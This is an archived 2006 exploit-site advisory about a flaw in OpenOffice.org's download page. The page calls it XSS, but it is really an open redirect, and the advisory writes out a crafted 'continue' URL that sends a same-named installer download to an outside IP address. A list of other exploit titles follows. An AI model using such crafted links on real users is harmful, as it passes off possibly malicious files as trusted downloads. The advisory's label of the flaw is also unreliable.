exploits , vulnerabilities , articles , OpenOffice.org XSS

2006-06-14

OpenOffice.org XSS

Author:    XiON
Date:      JUN1406
Type:      XSS
Product:   http://www.openoffice.org/
Patch:     N/A


Straight URL (From INDIANA U Mirror):
http://download.openoffice.org/2.0.2/contribute.html?continue=ftp%3A//ftp.ussg.iu.edu/pub/openoffice/stable/2.0.2/OOo_2.0.2_Win32Intel_install_wJRE.exe

Redirected URL:
http://download.openoffice.org/2.0.2/contribute.html?continue=http://216.66.19.100/~clockwo/OpenOffice/OOo_2.0.2_Win32Intel_install_wJRE.exe

Note: the file names are the same, 
so an unsuspecting user will hot continue on the download page,
and inadvertently download an unwanted and potentially dangerous file from
what appears to be a reliable website.

securitydot.net - 2006-06-14

Exploits - newest 10 RSS | More

2007-06-15 56286 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33520 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41672 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28846 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19358 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16377 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19020 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16253 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33096 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16898 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit